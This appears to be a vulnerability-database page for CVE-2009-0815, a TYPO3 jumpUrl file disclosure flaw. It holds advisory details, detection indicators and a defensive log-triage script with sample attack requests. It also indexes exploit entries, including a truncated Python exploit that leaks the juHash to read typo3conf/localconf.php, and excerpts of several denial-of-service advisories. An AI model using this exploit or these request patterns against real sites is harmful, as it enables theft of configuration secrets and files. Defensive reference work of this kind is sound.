CVE-2009-0815
Published 2009-03-05
Priority: P3 · 43 · medium · 5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 42.23% (98.5th percentile)
The jumpUrl mechanism in class.tslib_fe.php in TYPO3 3.3.x through 3.8.x, 4.0 before 4.0.12, 4.1 before 4.1.10, 4.2 before 4.2.6, and 4.3alpha1 leaks a hash secret (juHash) in an error message, which allows remote attackers to read arbitrary files by including the hash in a request.
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| typo3 | cms | >= 3.3 < 4.0.12 | 4.0.12 |
| typo3 | cms | >= 4.1 < 4.1.10 | 4.1.10 |
| typo3 | cms | >= 4.2 < 4.2.6 | 4.2.6 |
| typo3 | typo3 | — | — |
Detection & IOCs
- Look for HTTP requests to /index.php containing both 'juSecure=1' and 'locationData=' parameters, which indicate exploitation of the jumpUrl file disclosure mechanism.
- Monitor HTTP responses from TYPO3 for the error string pattern 'Calculated juHash, [a-z0-9]+, did not' which leaks the secret hash value to the attacker.
- Flag requests targeting sensitive TYPO3 configuration files via the jumpUrl parameter, especially 'typo3conf/localconf.php' which contains the security key.
- The attacker can read any file accessible to the web server user account, not just TYPO3-specific files; the default target is typo3conf/localconf.php but arbitrary paths can be supplied.
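
One way to apply the request and response indicators above to web-server logs, as an added example (not code from any of the sources indexed on this page). The combined-log request format, the sample lines, the hash values and the indicator names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Error-string pattern quoted in the detection notes above.
JUHASH_LEAK = re.compile(r"Calculated juHash, [a-z0-9]+, did not")
SENSITIVE_TARGETS = ("typo3conf/localconf.php",)  # extend with local paths
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def classify_request(log_line):
    """Return the indicator names that one access-log line matches."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/index.php"):
        return []
    # parse_qs percent-decodes values, so typo3conf%2Flocalconf.php is caught.
    # Lower-casing parameter names is a conservative choice for this example.
    params = {k.lower(): v for k, v in
              parse_qs(url.query, keep_blank_values=True).items()}
    if "1" not in params.get("jusecure", []) or "locationdata" not in params:
        return []
    hits = ["jumpurl-secure-request"]
    target = params.get("jumpurl", [""])[0].lower()
    if any(s in target for s in SENSITIVE_TARGETS):
        hits.append("sensitive-file-target")
    return hits

def response_leaks_juhash(body):
    """True when a response body contains the juHash error string."""
    return JUHASH_LEAK.search(body) is not None

def triage(lines):
    """Map each flagged log line to its indicators, skipping clean lines."""
    return {line: hits for line in lines if (hits := classify_request(line))}

# Constructed sample data: documentation addresses, invented hash values.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Feb/2009:12:00:01 +0000] "GET /index.php?jumpurl=typo3conf%2Flocalconf.php&type=0&juSecure=1&locationData=1%3A HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Feb/2009:12:00:05 +0000] "GET /index.php?id=42 HTTP/1.1" 200 9000',
    '198.51.100.7 - - [10/Feb/2009:12:01:00 +0000] "GET /index.php?jumpurl=fileadmin%2Fdoc.pdf&juSecure=1&locationData=12%3Att_content%3A5&juHash=0123456789 HTTP/1.1" 200 20480',
]
SAMPLE_BODY = "Calculated juHash, 0a1b2c3d4e, did not (constructed sample text)"

if __name__ == "__main__":
    for line, hits in triage(SAMPLE_LOG).items():
        print(hits, line)
    print("leak in response:", response_leaks_juhash(SAMPLE_BODY))
```

The third sample line matches the request indicator alone, so that indicator is best used together with the sensitive-target match or the response string rather than as a standalone alert.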
GHSA
TYPO3 leaks a hash secret in an error message
ghsa·2022-05-02
CVE-2009-0815 [MEDIUM] CWE-200 TYPO3 leaks a hash secret in an error message
OSV
TYPO3 leaks a hash secret in an error message
osv·2022-05-02
CVE-2009-0815 [MEDIUM] TYPO3 leaks a hash secret in an error message
No detection rules found.
Exploit-DB
Multiple Vendor - PF Null Pointer Dereference
exploitdb·2009-04-30
CVE-2009-0687 Multiple Vendor - PF Null Pointer Dereference
---
Helith - 0815
Author : Rembrandt
Date : 2009-04-30
Found : 2009-04-09
Affected Software: PF (OpenBSD Packet Filter)
Affected OS : OpenBSD 4.2 up to 4.5 and HEAD branch up to 2009-04-11
NetBSD 5.x up to RC3 and HEAD branch up to 2009-04-13
MirOS #10 and earlier
MidnightBSD 0.3-current
Not affected OS : FreeBSD
NetBSD 3.x, 4.x, 5.x (patched before release)
DragonflyBSD
Debian GNU/kFreeBSD
MidnightBSD prior 0.3
Older versions of OpenBSD PF and products based
thereon might be affected as well.
The Bug was introduced between the OpenBSD 4.1 and 4.2
release.
Type : Denial of Service
O
Exploit-DB
OpenBSD 4.5 - IP datagrams Remote Denial of Service
exploitdb·2009-04-13
CVE-2009-0687 OpenBSD 4.5 - IP datagrams Remote Denial of Service
---
Helith - 0815
Author : Rembrandt
Date : 2009-04-09
Affected Software: OpenBSD Kernel
Affected OS : OpenBSD 4.{3,4,5}, OpenBSD-current
Probably older versions are affected as well
Type : Denial of Service
OSVDB :
Milw0rm :
CVE :
ISS X-Force: :
BID :
Secunia : 34676
VUPEN ID :
Trying to fix it responsibly and get in contact with the vendor:
-- OpenBSD --
Contacted 2009-04-09 15:35 GMT+1
Patch available 2009-04-11 23:43 UTC
We received no response nor a notification about an upcoming patch by
the developers.
-- END --
OpenBSDs PF firewall in OpenBSD 4.3 up to OpenBSD-current
Exploit-DB
Gigaset SE461 WiMAX Router - Remote Denial of Service
exploitdb·2009-03-23
CVE-2009-1152 Gigaset SE461 WiMAX Router - Remote Denial of Service
---
Helith - 0815
Author : Benkei
Date : 2008-02-08
Vendor : Siemens
Affected product : Gigaset SE461 WiMAX router
Firmware version : 1.5-BL024.9.6401
Probably other firmware versions are affected as well
Type : Denial of Service
OSVDB :
Milw0rm :
CVE :
ISS X-Force: :
After establishing a tcp connection to the affected device on port 53 from the
LAN interface and after closing the connection the router will restart.
Sometimes when using the web trigger with Internet explorer the WAN
configuration (ip, gateway ip, dns servers) for the device was lost and a
hardware reset was
Exploit-DB
TYPO3 < 4.0.12/4.1.10/4.2.6 - 'jumpUrl' Remote File Disclosure
exploitdb·2009-02-10
CVE-2009-0815 TYPO3 < 4.0.12/4.1.10/4.2.6 - 'jumpUrl' Remote File Disclosure
TYPO3
```python
# date: 2009/02/10
# vendor url: http://typo3.org
# vulnerable versions: TYPO3 (defaults to typo3conf/localconf.php)
#
# if people fixed their installations but did not update the typo3 security key
# you should be able to precompute the hashes if you previously got the security key.
#
# greetings to milw0rm, roflek
import urllib,re,sys

strip = re.compile(r'.*Calculated juHash, ([a-z0-9]+), did not.*')

def useme():
    print sys.argv[0], ' (with http://) (defaults to typo3conf/localconf.php)'
    sys.exit(0)

def parsehash(host, f):
    file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:'})
    url = host + '/index.php?' + file
    try:
        s = urllib.urlopen(url)
        r = s.read()
    except Exception, e:
        print '[!] - ', str(e)
        return None
    tmp = strip.match(r)
    if tmp:
        return
```
Exploit-DB
Netgear SSL312 Router - Denial of Service
exploitdb·2009-02-09
CVE-2009-0680 Netgear SSL312 Router - Denial of Service
---
Helith - 0815
Author : Rembrandt
Date : 2008-02-27
Affected Software: proprietary CGI
Affected OS : Netgear embedded Linux for the SSL312 router
Probably other devices are affected as well
Type : Denial of Service
OSVDB :
Milw0rm : 8008
CVE :
ISS X-Force: :
BID : 33675
Trying to fix it responsibly and get in contact with the vendor:
-- ZDI --
Case Opened 2008-12-28 07:57 GMT-6
Case Closed 2009-01-15 17:01 GMT-6
"After some deliberation we have unfortunately decided that we won't be
accepting bugs affecting NetGear products."
-- END --
Contacting Netgear and mitre.org: 2009-02-01 1
Metasploit
Typo3 sa-2009-002 File Disclosure
metasploit
This module exploits a file disclosure vulnerability in the jumpUrl mechanism of Typo3. This flaw can be used to read any file that the web server user account has access to.
No writeups or analysis indexed.
- http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/
- http://www.debian.org/security/2009/dsa-1720
- http://www.openwall.com/lists/oss-security/2009/02/10/6
- http://www.securitytracker.com/id?1021710
Published: 2009-03-05